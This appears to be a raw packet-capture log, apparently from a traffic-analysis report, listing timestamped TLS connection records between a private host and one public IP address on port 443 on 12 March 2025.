                                                                        Mar 12, 2025 10:22:31.311630011 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.311677933 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.311714888 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.311732054 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.311764956 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.311912060 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.322396994 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.322441101 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.322478056 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.322489977 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.322518110 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.322637081 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.327261925 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.327356100 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.327390909 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.327405930 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.327433109 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.327589035 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.327594995 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.327742100 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.328999043 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.329122066 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.329129934 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.329230070 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.346478939 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.346527100 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.346559048 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.346569061 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.346600056 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.346662998 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.348475933 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.348598957 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.348608017 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.348694086 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.350658894 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.350824118 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.350831032 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.350910902 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.363162994 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.363209009 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.363245964 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.363255024 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.363282919 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.363620996 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.365391016 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.365581036 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.365588903 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.365663052 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.368702888 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.368768930 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.368777037 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.368932962 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.393913984 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.393963099 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.393999100 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.394006968 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.394047976 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.394244909 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.400423050 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.400588989 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.400597095 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.400741100 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.405023098 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.405153036 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.405160904 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.405246973 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.415807009 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.415869951 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.415884018 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.415920019 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.415951967 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.416053057 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.416215897 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.416352987 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.416363001 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.416435003 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.417901039 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.417979002 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.417985916 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.418246984 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.435091019 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.435133934 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.435175896 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.435185909 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.435209036 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.435302973 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.437072992 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.437166929 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.437175035 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.439183950 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.439336061 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.439343929 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.440042973 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.451713085 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.451757908 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.451795101 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.451802015 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.451829910 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.451946020 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.453845024 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.454150915 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.454158068 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.454336882 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.457113981 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.457317114 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.457324982 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.458084106 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.470875025 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.471019983 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.471026897 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.471262932 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.489121914 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.489197969 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.489236116 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.489245892 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.489270926 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.489362001 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.499528885 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.499608040 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.499697924 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.499705076 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.499732971 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.499855042 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.504628897 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.504673004 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.504753113 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.504753113 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.504760981 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.505125046 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.513144016 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.513219118 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.513253927 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.513261080 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.513287067 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.513317108 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.525687933 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.525729895 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.525810003 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.525810003 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.525819063 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.526073933 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.533818960 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.533864021 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.533946991 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.533946991 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.533953905 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.534037113 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.542459011 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.542536974 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.542558908 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.542566061 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.542612076 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.542613029 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.559559107 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.559624910 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.559660912 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.559669018 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.559698105 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.560112000 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.577620029 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.577666044 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.577759981 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.577759981 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.577768087 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.578282118 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.588175058 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.588274002 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.588289022 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.588433027 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.593198061 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.593244076 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.593518972 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.593528032 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.593605995 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.601929903 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.601977110 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.602073908 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.602073908 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.602082968 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.602360010 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.614264011 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.614326000 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.614365101 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.614373922 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.614399910 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.616254091 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.622452021 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.622531891 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.622569084 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.622575998 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.622607946 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.622919083 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.630971909 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.630990982 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.631112099 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.631112099 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.631119967 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.632292986 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.647989988 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.648060083 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.648097038 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.648097038 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.648104906 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.648132086 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.648154020 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.666181087 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.666201115 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.666277885 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.666277885 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.666287899 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.666342020 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.676709890 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.676738977 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.676814079 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.676814079 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.676827908 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.680211067 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.681848049 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.681864977 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.681986094 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.681993961 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.684447050 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.690310955 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.690325975 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.690526009 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.690535069 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.690814972 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.703793049 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.703809977 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.703897953 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.703898907 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.703916073 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.704119921 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.711134911 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.711153984 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.711339951 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.711352110 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.711435080 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.719427109 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.719444990 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.719542980 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.719542980 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.719558954 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.719706059 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.736526966 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.736574888 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.736609936 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.736618996 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.736645937 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.736874104 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.754868984 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.754893064 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.754959106 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.754968882 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.755187988 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.765307903 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.765325069 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.765455008 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.765464067 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.765537977 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.770306110 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.770330906 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.770431042 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.770431042 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.770442009 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.770504951 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.778920889 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.778944016 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.779042006 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.779053926 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.779162884 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.792392015 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.792409897 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.792500019 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.792500019 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.792509079 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.796422958 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.799771070 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.799793959 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.799868107 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.799868107 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.799875975 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.799946070 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.808075905 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.808103085 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.808209896 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.808209896 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.808218002 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.808419943 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.825289965 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.825334072 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.825362921 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.825371027 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.825396061 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.826598883 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.843277931 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.843311071 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.843354940 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.843364000 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.843394041 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.843497992 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.853837967 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.853857040 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.853935003 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.853935003 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.853944063 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.854091883 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.858725071 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.858732939 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.858851910 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.858860970 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.858951092 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.875993013 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.876013041 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.876120090 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.876127958 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.876544952 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.881042004 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.881058931 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.881380081 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.881387949 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.881812096 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.888277054 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.888295889 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.888389111 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.888389111 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.888400078 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.892132998 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.896526098 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.896543980 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.896612883 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.896612883 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.896620989 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.896748066 CET49686443192.168.2.643.132.105.214
                                                                        Mar 12, 2025 10:22:31.913902044 CET4434968643.132.105.214192.168.2.6
                                                                        Mar 12, 2025 10:22:31.913964033 CET4434968643.132.105.214192.168.2.6
